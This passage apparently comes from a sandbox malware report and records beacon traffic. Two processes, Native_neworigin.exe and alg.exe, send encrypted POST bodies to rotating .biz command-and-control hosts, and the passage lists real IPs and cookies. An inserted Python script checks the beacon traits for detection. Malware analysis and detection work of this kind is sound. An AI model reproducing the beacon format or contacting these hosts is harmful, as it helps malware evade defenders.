  Data Ascii: pv8rR#YX(~W xL@\P--<'O$6d,(Kr-guTPFs}L|V3^)u`n[iWP`{N1H^ddz/32+G3.t&z;rKiBr{R|QY27]S{n)=
Nov 26, 2024 08:15:04.208981991 CET | 407 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:15:03 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=bfa008cf86718dc4912b07f78da8a175|8.46.123.75|1732605303|1732605303|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.10 | 50041 | 35.164.78.200 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:03.334789991 CET | 354 | OUT | POST /fvahgnbvglin HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: nqwjmb.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:15:03.334789991 CET | 834 | OUT | Data Raw: db 75 c0 07 6f 6e fb 29 36 03 00 00 4d da 51 f8 c3 ff 24 16 32 2c 03 1f c3 f4 6d fe 15 cf 3e 28 72 79 c9 f6 5a 91 c0 a6 8d 8c 80 8d 3f b3 d8 89 48 56 1c 54 7c 5d 88 62 4a 60 87 0e ef 53 c0 97 37 da 58 2d f0 cd 07 d6 de 1b 02 37 47 7b 8b ff db 19
  Data Ascii: uon)6MQ$2,m>(ryZ?HVT|]bJ`S7X-7G{A1H@e\G8APdSg8]qRzo+Lwq}:S_hR;e*BD8Dussh0E$TErWjZPXs|/&PQXW5yX~wU@8
Nov 26, 2024 08:15:04.791903019 CET | 408 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:15:04 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=240379ab788c113c2ddde498b88a8a97|8.46.123.75|1732605304|1732605304|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.10 | 50042 | 54.244.188.177 | 80 | 6072 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:04.969707012 CET | 357 | OUT | POST /xwmumuqawghep HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: lrxdmhrr.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 778
Nov 26, 2024 08:15:04.969707012 CET | 778 | OUT | Data Raw: a1 2a 4d 1b be 9e d2 2e fe 02 00 00 ff ce e7 aa ea 7d 6e 52 95 2b 57 76 38 77 0e 08 52 c5 27 43 19 11 30 ea 58 3a 50 9f f9 26 18 aa 7b 18 f8 9e 99 db 44 2a de 2d 74 ae 99 c4 3c 22 83 89 2a 02 3f 9c eb 14 0f 6b e7 e9 8f 2f bf 23 dc a8 d4 d7 07 07
  Data Ascii: *M.}nR+Wv8wR'C0X:P&{D*-t<"*?k/#<Vkw6\/\"TTngizC.m_eZvfB~k=y'`Sl[))z1iu#VStm"oaozEJM1*N<
Nov 26, 2024 08:15:06.419820070 CET | 410 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:15:06 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=ebadefe96bc019e88642fb3de0577791|8.46.123.75|1732605306|1732605306|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.10 | 50043 | 3.94.10.34 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:05.155622005 CET | 358 | OUT | POST /anxrplnvdvpxn HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ytctnunms.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 834
Nov 26, 2024 08:15:05.155622005 CET | 834 | OUT | Data Raw: 6c 86 9d 58 96 3e 12 5f 36 03 00 00 d6 e4 ed a6 cd c4 55 4f 53 56 64 05 69 11 22 f6 be a5 29 42 ff ea 99 32 63 12 4a 96 5f 6c 15 ab b4 3a f6 3c 62 57 5c 2c 8b 4d 70 6f 35 81 00 fe 86 87 ce 60 9e a3 13 eb 31 b0 f7 71 a8 f7 76 1c 03 1c 59 e8 35 79
  Data Ascii: lX>_6UOSVdi")B2cJ_l:<bW\,Mpo5`1qvY5yveLexk34aOV3r>p>eT!=tFPd/^>JJzlU{XI6.|d!kF7ER?8#efv,DuH]IRq
Nov 26, 2024 08:15:06.251966000 CET | 411 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 26 Nov 2024 07:15:06 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=18e8fa65e7649fecfd3cceb3e7755108|8.46.123.75|1732605306|1732605306|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID: 63 | Source IP: 192.168.2.10 | Source Port: 50044 | Destination IP: 165.160.15.20 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:06.545288086 CET | 351 | OUT | POST /iytkitpluk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:06.545353889 CET | 834 | OUT | Data Raw: ae 57 c1 03 a9 a3 63 c7 36 03 00 00 aa e8 54 f8 4f 60 10 be 50 ec 65 77 85 7d 17 45 19 9f 96 3d 27 3b 20 c6 d2 33 41 91 6b 08 9b 2f 38 2d b7 aa 98 2b 27 76 3b b3 f3 ee c9 32 5d 97 13 df b0 39 e6 fe fa 4a 9c ba 23 bc 01 29 e2 ec 35 22 65 47 27 ff
Data Ascii: Wc6TO`Pew}E='; 3Ak/8-+'v;2]9J#)5"eG'E7=G>Bv]<K)(-d2Z4cK<*pn>aVN0cmvsLI44+{.DlxfseF?sene4~VOe
Nov 26, 2024 08:15:07.936511040 CET | 170 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 07:15:07 GMT
Content-Length: 94
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID: 64 | Source IP: 192.168.2.10 | Source Port: 50045 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 6072 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:07.138751984 CET | 347 | OUT | POST /cngo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:07.138919115 CET | 778 | OUT | Data Raw: d3 de b9 1d 45 47 85 ea fe 02 00 00 82 aa f9 3d 0e fd e8 de ea bd 65 8f d9 e5 b4 c7 aa 3c f0 1f 69 24 24 07 39 8b 3f 4c 6b 6f 32 3d 82 8d d3 c8 e7 96 b1 7f ab f2 2c 7f f6 04 fc 3f 7b fc 37 3c 95 da 92 84 1a 73 d8 9c cd c6 10 56 a3 cc f4 e2 f5 c0
Data Ascii: EG=e<i$$9?Lko2=,?{7<sV\hh*dWr%yF24%*^?jizX!@/#a]Sb>;y;U}K6+`.Ad\a!*iU`:bM:F=XOOGn\!-s9
Nov 26, 2024 08:15:09.211065054 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c2a5bce5128c88d67dbec2801d78419f|8.46.123.75|1732605308|1732605308|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 65 | Source IP: 192.168.2.10 | Source Port: 50046 | Destination IP: 165.160.15.20 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:08.074959993 CET | 346 | OUT | POST /uwugf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:08.075006008 CET | 834 | OUT | Data Raw: 54 19 ce 96 b5 63 e3 b9 36 03 00 00 e5 e1 df 35 b8 4d 33 b1 36 e8 77 73 b4 06 6f ed e4 3d 73 35 ac e7 b0 4f 5f d8 54 95 14 59 17 dc af f8 5d 4e 6e 14 ac a2 9b 44 0a 8b d7 03 62 cb cc 7c 88 5d ca 17 e7 04 ad b2 83 d9 67 45 1b 8f ba f3 e5 e2 9e 37
Data Ascii: Tc65M36wso=s5O_TY]NnDb|]gE7gP>H;CG$v4/ "/).CR \"9%:?h}I"j=(+{^,c0z6(D'ApUD8e'gb(<Gz
Nov 26, 2024 08:15:09.332534075 CET | 170 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 07:15:09 GMT
Content-Length: 94
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
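
The sessions above share one beacon shape: a POST with the same fixed User-Agent to a short lowercase path on a .biz host, a body whose first 8 bytes differ per request while bytes 8..11 are a little-endian uint32 equal to Content-Length minus 12 (834 -> 0x336 = 822 in every 834-byte body, 778 -> 0x2fe = 766 in the alg.exe body), and, from the nginx hosts, a btst cookie whose IP field is the sandbox's public address and whose two epoch fields match the response Date header to the second. The myups.biz host at 165.160.15.20 instead answers with a fixed 94-byte HTML page and no cookies. The following script is an added example, not part of the Joe Sandbox report and not the sample's own code; it checks those traits over records constructed from sessions 63 to 66 on this page. The 12-byte header interpretation is inferred from the bodies shown here, not documented by the sandbox, and the indicator names are this example's own.

```python
"""Structural checks on the HTTP beacons captured in this report.
Added example, not Joe Sandbox code.  SESSIONS is constructed from the
request/response lines on this page; each POST body is truncated to its
first 12 bytes because that is all the checks need.  The split into an
8-byte opaque prefix plus a uint32 LE length is an inference from the
five bodies visible above, not something the sandbox states."""
import re
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Optional

# The same User-Agent appears on every request in the capture.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

# Constructed from sessions 63-66 of the report (bodies cut to 12 bytes).
SESSIONS = [
    {"id": 63, "host": "myups.biz", "path": "/iytkitpluk", "user_agent": UA,
     "content_length": 834, "body_prefix": "ae 57 c1 03 a9 a3 63 c7 36 03 00 00",
     "date": "Tue, 26 Nov 2024 07:15:07 GMT", "set_cookie": None},
    {"id": 64, "host": "wllvnzb.biz", "path": "/cngo", "user_agent": UA,
     "content_length": 778, "body_prefix": "d3 de b9 1d 45 47 85 ea fe 02 00 00",
     "date": "Tue, 26 Nov 2024 07:15:08 GMT",
     "set_cookie": "btst=c2a5bce5128c88d67dbec2801d78419f|8.46.123.75|1732605308|"
                   "1732605308|0|1|0; path=/; domain=.wllvnzb.biz; HttpOnly; SameSite=Lax;"},
    {"id": 65, "host": "myups.biz", "path": "/uwugf", "user_agent": UA,
     "content_length": 834, "body_prefix": "54 19 ce 96 b5 63 e3 b9 36 03 00 00",
     "date": "Tue, 26 Nov 2024 07:15:09 GMT", "set_cookie": None},
    {"id": 66, "host": "oshhkdluh.biz", "path": "/bvxo", "user_agent": UA,
     "content_length": 834, "body_prefix": "b3 49 57 ab 63 8f c1 f6 36 03 00 00",
     "date": "Tue, 26 Nov 2024 07:15:10 GMT",
     "set_cookie": "btst=9129f0afd86c392e67e0ab9c0f55731d|8.46.123.75|1732605310|"
                   "1732605310|0|1|0; path=/; domain=.oshhkdluh.biz; HttpOnly; SameSite=Lax;"},
]

HEADER_LEN = 12  # 8 opaque bytes + 4-byte length field (inferred from the capture)
RANDOM_PATH_RE = re.compile(r"^/[a-z]{4,12}$")
BTST_RE = re.compile(r"btst=([0-9a-f]{32})\|(\d{1,3}(?:\.\d{1,3}){3})\|(\d+)\|(\d+)\|")


def length_field(body_prefix_hex: str) -> int:
    """Bytes 8..11 of the POST body read as a little-endian uint32."""
    raw = bytes.fromhex(body_prefix_hex)
    return struct.unpack_from("<I", raw, 8)[0]


def length_prefix_ok(content_length: int, body_prefix_hex: str) -> bool:
    """True when the embedded length equals Content-Length minus the 12-byte header."""
    return length_field(body_prefix_hex) == content_length - HEADER_LEN


def parse_btst(set_cookie: str) -> Optional[dict]:
    """Split the btst cookie: tag | client IP | first-seen epoch | last-seen epoch | ..."""
    m = BTST_RE.search(set_cookie)
    if m is None:
        return None
    tag, ip, first, last = m.groups()
    return {"tag": tag, "client_ip": ip,
            "first_seen": datetime.fromtimestamp(int(first), timezone.utc),
            "last_seen": datetime.fromtimestamp(int(last), timezone.utc)}


def beacon_indicators(s: dict) -> list:
    """Name the traits of one session that match the beacon shape in the capture."""
    hits = []
    if s["user_agent"] == UA:
        hits.append("fixed-ua")
    if s["host"].endswith(".biz") and RANDOM_PATH_RE.match(s["path"]):
        hits.append("dga-style-host-path")
    if length_prefix_ok(s["content_length"], s["body_prefix"]):
        hits.append("length-prefixed-body")
    cookie = parse_btst(s["set_cookie"]) if s["set_cookie"] else None
    if cookie is not None:
        served = parsedate_to_datetime(s["date"])  # aware UTC datetime for "GMT"
        if abs((cookie["first_seen"] - served).total_seconds()) <= 1:
            hits.append("btst-epoch-matches-date")
    return hits


def summarize(sessions=SESSIONS) -> dict:
    """Map session id -> list of matched indicators."""
    return {s["id"]: beacon_indicators(s) for s in sessions}


if __name__ == "__main__":
    for sid, hits in summarize().items():
        print(sid, ", ".join(hits))
```

Sessions 63 and 65 match only the request-side traits because 165.160.15.20 sets no cookie; 64 and 66 match all four. The length check is the most useful of these for a network rule, since it holds regardless of the host or path the sample rotates through.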


Session ID: 66 | Source IP: 192.168.2.10 | Source Port: 50047 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:09.626559973 CET | 349 | OUT | POST /bvxo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:09.626615047 CET | 834 | OUT | Data Raw: b3 49 57 ab 63 8f c1 f6 36 03 00 00 df 6f 3f 1c 61 c3 17 ad f2 03 b2 d0 8e 67 dc 78 cc cf 8d 37 2a 03 d2 40 c9 f8 4d 12 06 d1 85 12 6b db 71 fa 00 38 c7 77 e1 ea 3f 28 9c 15 d1 67 f3 35 fc 30 4b 52 eb c0 49 cf c7 ae f8 2f d8 9a 55 8c 6e 9c 7c 2f
Data Ascii: IWc6o?agx7*@Mkq8w?(g50KRI/Un|/AJTKYgAP0qv9dtR?aTd/BT9Q[[6HcTo$-EUW])7[4#)ykD:Fj8$uw-{
Nov 26, 2024 08:15:11.028804064 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9129f0afd86c392e67e0ab9c0f55731d|8.46.123.75|1732605310|1732605310|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.10 | 50048 | 18.208.156.248 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:10.136670113 CET | 349 | OUT | POST /torfbleb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:10.136713982 CET | 778 | OUT | Data Raw: 2f 62 56 fc f7 f3 28 38 fe 02 00 00 8b d2 cd 1a 10 69 a0 c6 30 eb 05 83 d5 07 02 08 3d 00 51 0d 0e f0 40 54 ab ba e6 cc 95 35 8c 14 93 47 00 09 05 df a1 0d d0 8f 79 15 c3 2b ed e9 ff 29 93 2d ed 49 e9 85 e0 8d 9b 22 2f a8 2c 11 68 60 b3 3c 3e 6a
Data Ascii: /bV(8i0=Q@T5Gy+)-I"/,h`<>j(;O!SUR]oD&Bf0R1x!kp5`FjE;B_"lvp_iZ$?.I>{xJ9&BtiT/b,\&WO Y]U;j|_]J 0ko
Nov 26, 2024 08:15:11.251173973 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c323fd5672dc96fc88ffe94a702589a6|8.46.123.75|1732605311|1732605311|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.10 | 50049 | 208.100.26.245 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:11.354568958 CET | 356 | OUT | POST /iqacwcupavovv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:11.354594946 CET | 834 | OUT | Data Raw: 8c 4e 03 23 76 13 6c 04 36 03 00 00 79 40 d2 ef 15 2c 40 c1 81 bb 5e 61 48 8b 20 7a b8 75 2a b5 86 9b 92 72 6a 11 09 3c 71 a6 49 80 d1 2f 7b ce 82 5a 21 cb c8 ed 78 44 e5 81 d1 c5 4f d1 86 db b8 de 88 07 27 2e 0e 22 a8 ef 7a b6 d3 4d df 3a 28 06
Data Ascii: N#vl6y@,@^aH zu*rj<qI/{Z!xDO'."zM:(#bKuvbhha,@$u'~XX"Rl#E?{.`w0w`}L7&.jdM%'{-K]eF".Y[885>>\B0>x!p/dQ
Nov 26, 2024 08:15:12.525130987 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 26 Nov 2024 07:15:12 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.10 | 50050 | 44.221.84.105 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:11.939577103 CET | 356 | OUT | POST /gknotpflubkt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:11.939608097 CET | 778 | OUT | Data Raw: cb 21 0d f4 e8 fc 22 00 fe 02 00 00 b4 ae a0 1a 32 cf 9c 0b 4e 87 7d 83 e8 0c 24 12 ec 9d be 98 4a 02 31 bd c5 9c 64 67 e5 ab b5 f7 3f 46 87 81 73 70 8c 0f 1f c9 b6 df 02 df d9 14 56 2e c0 27 ad df 3c 76 ff 9e 3d f6 c1 9c b7 27 39 90 d2 14 95 0f
Data Ascii: !"2N}$J1dg?FspV.'<v='9mXW?x%dyqSINA5 ,fKIiu5JDO4\eBzA(Z<h}{C/(bUI#wluUta(';p1
Nov 26, 2024 08:15:13.086143017 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=601ae2e46398fa031c906ff13183f80c|8.46.123.75|1732605312|1732605312|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
70         | 192.168.2.10 | 50051       | 208.100.26.245 | 80               | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:12.729901075 CET | 346 | OUT
    POST /njk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yunalwv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:15:12.729923010 CET | 834 | OUT
    Data Raw: 92 13 f2 62 56 61 78 bc 36 03 00 00 6b a4 1f 63 4b e0 0a 4e 73 12 4c ca 4d a7 3e af d2 6a e8 56 31 e5 8b 79 34 2e 8e 31 ab ff 88 55 1e ee 10 55 da a6 ba 30 8e a5 be 76 e7 a1 6c a6 63 65 f3 7c 1e 06 8e 87 55 9f 3d 3c 09 93 1c 0e a2 59 8d a6 37 0c
    Data Ascii: bVax6kcKNsLM>jV1y4.1UU0vlce|U=<Y7x5fCS*GpALW.ZqtrS[L~ocgX,'d-CKR>7'ioFOSLFtQPNu?o':}ioN
Nov 26, 2024 08:15:13.907181978 CET | 744 | IN
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 26 Nov 2024 07:15:13 GMT
    Content-Type: text/html
    Content-Length: 580
    Connection: keep-alive
